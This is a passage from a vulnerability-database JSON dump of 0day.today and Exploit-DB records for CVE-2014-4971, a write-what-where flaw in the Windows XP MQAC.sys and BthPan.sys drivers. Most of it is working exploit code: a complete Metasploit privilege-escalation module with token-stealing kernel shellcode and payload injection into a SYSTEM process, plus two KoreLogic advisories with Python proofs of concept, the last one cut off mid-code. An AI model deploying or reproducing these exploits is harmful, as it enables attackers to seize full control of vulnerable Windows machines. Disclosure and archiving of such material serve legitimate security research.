"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22462"}, {"lastseen": "2018-03-09T19:09:07", "edition": 2, "description": "A vulnerability within the MQAC.sys module allows an attacker to overwrite an arbitrary location in kernel memory. This Metasploit module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process.", "published": "2014-07-25T00:00:00", "type": "zdt", "title": "MQAC.sys Arbitrary Write Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-25T00:00:00", "id": "1337DAY-ID-22477", "href": "https://0day.today/exploit/description/22477", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = AverageRanking\r\n\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',\r\n 'Description' => %q{\r\n A vulnerability within the MQAC.sys module allows an attacker to\r\n overwrite an arbitrary location in kernel memory.\r\n\r\n This module will elevate itself to SYSTEM, then inject the payload\r\n into another SYSTEM process.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt Bergin', # original exploit and all the hard work\r\n 'Spencer McIntyre' # MSF module\r\n ],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP SP3',\r\n {\r\n '_KPROCESS' => \"\\x44\",\r\n '_TOKEN' => \"\\xc8\",\r\n '_UPID' => \"\\x84\",\r\n '_APLINKS' => \"\\x88\"\r\n }\r\n ],\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-4971' ],\r\n [ 'EDB', '34112' ],\r\n [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]\r\n ],\r\n 'DisclosureDate'=> 'Jul 22 2014',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def find_sys_base(drvname)\r\n session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')\r\n session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]])\r\n session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]])\r\n results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)\r\n addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack(\"L*\")\r\n\r\n addresses.each do |address|\r\n results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)\r\n current_drvname = results['lpBaseName'][0..results['return'] - 1]\r\n if drvname == nil\r\n if current_drvname.downcase.include?('krnl')\r\n return [address, current_drvname]\r\n end\r\n elsif drvname == results['lpBaseName'][0..results['return'] - 1]\r\n return [address, current_drvname]\r\n end\r\n end\r\n end\r\n\r\n # Function borrowed from smart_hashdump\r\n def get_system_proc\r\n # Make sure you got the correct SYSTEM Account Name no matter the OS Language\r\n local_sys = resolve_sid(\"S-1-5-18\")\r\n system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"\r\n\r\n this_pid = session.sys.process.getpid\r\n # Processes that can Blue Screen a host if migrated in to\r\n dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]\r\n session.sys.process.processes.each do |p|\r\n # Check we are not migrating to a process that can BSOD the host\r\n next if dangerous_processes.include?(p[\"name\"])\r\n next if p[\"pid\"] == this_pid\r\n next if p[\"pid\"] == 4\r\n next if p[\"user\"] != system_account_name\r\n return p\r\n end\r\n end\r\n\r\n def open_device\r\n handle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil)\r\n if handle['return'] == 0\r\n print_error('Failed to open the \\\\\\\\.\\\\MQAC device')\r\n return nil\r\n end\r\n handle = handle['return']\r\n end\r\n\r\n def check\r\n handle = open_device\r\n if handle.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n os = sysinfo[\"OS\"]\r\n case os\r\n when /windows xp.*service pack 3/i\r\n return Exploit::CheckCode::Appears\r\n when /windows xp/i\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n if sysinfo[\"Architecture\"] =~ /wow64/i\r\n print_error(\"Running against WOW64 is not supported\")\r\n return\r\n elsif sysinfo[\"Architecture\"] =~ /x64/\r\n print_error(\"Running against 64-bit systems is not supported\")\r\n return\r\n end\r\n\r\n if is_system?\r\n print_error(\"This meterpreter session is already running as SYSTEM\")\r\n return\r\n end\r\n\r\n kernel_info = find_sys_base(nil)\r\n base_addr = 0xffff\r\n print_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\")\r\n\r\n handle = open_device\r\n return if handle.nil?\r\n\r\n this_proc = session.sys.process.open\r\n unless this_proc.memory.writable?(base_addr)\r\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\")\r\n end\r\n unless this_proc.memory.writable?(base_addr)\r\n print_error('Failed to properly allocate memory')\r\n this_proc.close\r\n return\r\n end\r\n\r\n hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)\r\n hKernel = hKernel['return']\r\n halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\")\r\n halDispatchTable = halDispatchTable['return']\r\n halDispatchTable -= hKernel\r\n halDispatchTable += kernel_info[0]\r\n print_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\")\r\n\r\n tokenstealing = \"\\x52\" # push edx # Save edx on the stack\r\n tokenstealing << \"\\x53\" # push ebx # Save ebx on the stack\r\n tokenstealing << \"\\x33\\xc0\" # xor eax, eax # eax = 0\r\n tokenstealing << \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD\r\n tokenstealing << \"\\x8b\\x40\" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS\r\n tokenstealing << \"\\x8b\\xc8\" # mov ecx, eax\r\n tokenstealing << \"\\x8b\\x98\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN\r\n tokenstealing << \"\\x8b\\x80\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks\r\n tokenstealing << \"\\x81\\xe8\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks\r\n tokenstealing << \"\\x81\\xb8\" + target['_UPID'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)\r\n tokenstealing << \"\\x75\\xe8\" # jne 0000101e ======================\r\n tokenstealing << \"\\x8b\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX\r\n tokenstealing << \"\\x8b\\xc1\" # mov eax, ecx # Retrieves KPROCESS stored on ECX\r\n tokenstealing << \"\\x89\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS\r\n tokenstealing << \"\\x5b\" # pop ebx # Restores ebx\r\n tokenstealing << \"\\x5a\" # pop edx # Restores edx\r\n tokenstealing << \"\\xc2\\x10\" # ret 10h # Away from the kernel!\r\n\r\n shellcode = make_nops(0x200) + tokenstealing\r\n this_proc.memory.write(0x1, shellcode)\r\n this_proc.close\r\n\r\n print_status(\"Triggering vulnerable IOCTL\")\r\n session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)\r\n result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)\r\n\r\n unless is_system?\r\n print_error(\"Exploit failed\")\r\n return\r\n end\r\n\r\n proc = get_system_proc\r\n print_status(\"Injecting the payload into SYSTEM process: #{proc['name']}\")\r\n unless execute_shellcode(payload.encoded, nil, proc['pid'])\r\n fail_with(Failure::Unknown, \"Error while executing the payload\")\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22477"}, {"lastseen": "2018-03-20T01:20:18", "description": "Exploit for windows platform in category local exploits", "edition": 2, "published": "2014-07-22T00:00:00", "type": "zdt", "title": "Microsoft XP SP3 BthPan.sys - Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-22T00:00:00", "id": "1337DAY-ID-22459", "href": "https://0day.today/exploit/description/22459", "sourceData": "\"\"\"\r\nTitle: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-002\r\nPublication Date: 2014-07-18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\r\n \r\n \r\n1. Vulnerability Details\r\n \r\n Affected Vendor: Microsoft\r\n Affected Product: Bluetooth Personal Area Networking\r\n Affected Versions: 5.1.2600.5512\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n \r\n2. Vulnerability Description\r\n \r\n A vulnerability within the BthPan module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n \r\n3. Technical Description\r\n \r\n A userland process can create a handle into the BthPan device\r\n and subsequently make DeviceIoControlFile() calls into that\r\n device. During the IRP handler routine for 0x0012b814 the user\r\n provided OutputBuffer address is not validated. This allows an\r\n attacker to specify an arbitrary address and write\r\n (or overwrite) the memory residing at the specified address.\r\n This is classicaly known as a write-what-where vulnerability and\r\n has well known exploitation methods associated with it.\r\n \r\n A stack trace from our fuzzing can be seen below. In our fuzzing\r\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\r\n call is 0xffff0000.\r\n \r\nSTACK_TEXT:\r\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\r\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\r\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\r\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\r\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\r\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\r\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\r\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\r\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\r\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\r\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\r\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\r\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\r\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n \r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the bthpan driver.\r\n \r\nFOLLOWUP_IP:\r\nbthpan!BthpanReqAdd+16b\r\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\r\n \r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n \r\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\r\nErrCode = 00000002\r\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\r\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\r\nnt!IopCompleteRequest+0x92:\r\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n \r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in BthPan it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n \r\n4. Mitigation and Remediation Recommendation\r\n \r\n None. A patch is not likely to be forthcoming from the vendor.\r\n \r\n5. Credit\r\n \r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n \r\n6. Disclosure Timeline\r\n \r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have not\r\n been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\r\n passed since vendor acknowledgement of the initial\r\n report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\r\n does not impact any \"up-platform\" products. Says they\r\n are investigating embedded platforms. Does not provide\r\n CVE number.\r\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\r\n the report of this vulnerability with another and that\r\n they cannot reproduce the described behavior.\r\n Microsoft asks for an updated Proof-of-Concept, crash\r\n dumps or any further analysis of the vulnerability\r\n that KoreLogic can provide.\r\n 2014.06.25 - KoreLogic provides Microsoft with an updated\r\n Proof-of-Concept which demonstrates using the\r\n vulnerability to spawn a system shell.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that a CVE\r\n ID be issued for this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\r\n identical to KL-001-2014-003 and issues CVE-2014-4971\r\n for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n \r\n7. Proof of Concept\r\n\"\"\"\r\n \r\n#!/usr/bin/python2\r\n#\r\n# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\n# Matt Bergin (KoreLogic / Smash the Stack)\r\n# CVE-2014-4971\r\n#\r\nfrom ctypes import *\r\nfrom struct import pack\r\nfrom os import getpid,system\r\nfrom sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n \r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them\r\n def getBase(name=None):\r\n retArray = c_ulong*1024\r\n ImageBase = retArray()\r\n callback = c_int(1024)\r\n cbNeeded = c_long()\r\n EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n for base in ImageBase:\r\n driverName = c_char_p(\"\\x00\"*1024)\r\n GetDeviceDriverBaseNameA(base,driverName,48)\r\n if (name):\r\n if (driverName.value.lower() == name):\r\n return base\r\n else:\r\n return (base,driverName.value)\r\n return None\r\n \r\n handle = CreateFileA(\"\\\\\\\\.\\\\BthPan\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n if (handle == INVALID_HANDLE_VALUE):\r\n print \"[!] Could not open handle to BthPan\"\r\n exit(1)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = \"\\xcc\\xcc\\xcc\\xcc\"+\"\\x90\"*0x400\r\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n \r\n\"\"\"\r\nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc.\r\nand are licensed under a Creative Commons Attribution Share-Alike 4.0\r\n(United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n \r\nKoreLogic, Inc. is a founder-owned and operated company with a proven\r\ntrack record of providing security services to entities ranging from\r\nFortune 500 to small and mid-sized companies. We are a highly skilled\r\nteam of senior security consultants doing by-hand security assessments\r\nfor the most important networks in the U.S. and around the world. We\r\nare also developers of various tools and resources aimed at helping\r\nthe security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n \r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\r\n\"\"\"\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22459"}], "exploitdb": [{"lastseen": "2016-02-03T20:31:34", "description": "Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation. CVE-2014-4971. Local exploit for windows platform", "published": "2014-07-19T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-19T00:00:00", "id": "EDB-ID:34112", "href": "https://www.exploit-db.com/exploits/34112/", "sourceData": "Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-003\r\nPublication Date: 2014.07.18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: MQ Access Control\r\n Affected Versions: 5.1.0.1110\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the MQAC module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the MQAC device and\r\n subsequently make DeviceIoControlFile() calls into that device.\r\n During the IRP handler routine for 0x1965020f the user provided\r\n OutputBuffer address is not validated. This allows an attacker\r\n to specify an arbitrary address and write (or overwrite) the\r\n memory residing at the specified address. This is classically\r\n known as a write-what-where vulnerability and has well known\r\n exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. In our\r\n fuzzing testcase, the specified OutputBuffer in the\r\n DeviceIoControlFile() call is 0xffff0000.\r\n\r\nSTACK_TEXT: \r\nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\r\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\r\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\r\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\r\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the mqac driver.\r\n\r\nOLLOWUP_IP: \r\nmqac!AC2QM+5d\r\nb230af37 891e mov dword ptr [esi],ebx\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\r\nErrCode = 00000002\r\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\r\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\r\nmqac!AC2QM+0x5d:\r\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in MQAC it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have\r\n not been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\r\n have passed since vendor acknowledgement of the\r\n initial report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft responds to KoreLogic that the\r\n vulnerability does not affect an \"up-platform\"\r\n product. Says they are investigating embedded\r\n platforms. Does not provide a CVE number or a\r\n disclosure date.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that\r\n a CVE ID be issued to this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\r\n be identical to KL-001-2014-002 and issues\r\n CVE-2014-4971 for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n #!/usr/bin/python2\r\n #\r\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\n # Matt Bergin (KoreLogic / Smash the Stack)\r\n # CVE-2014-4971\r\n #\r\n from ctypes import *\r\n from struct import pack\r\n from os import getpid,system\r\n from sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n\r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them :)\r\n def getBase(name=None):\r\n retArray = c_ulong*1024\r\n ImageBase = retArray()\r\n callback = c_int(1024)\r\n cbNeeded = c_long()\r\n EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n for base in ImageBase:\r\n driverName = c_char_p(\"\\x00\"*1024)\r\n GetDeviceDriverBaseNameA(base,driverName,48)\r\n if (name):\r\n if (driverName.value.lower() == name):\r\n return base\r\n else:\r\n return (base,driverName.value)\r\n return None\r\n\r\n handle = CreateFileA(\"\\\\\\\\.\\\\MQAC\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n print \"[+] Handle \\\\\\\\.\\\\MQAC @ %s\" % (handle)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = \"\\x50\\x00\\x00\\x00\"+\"\\x90\"*0x400\r\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 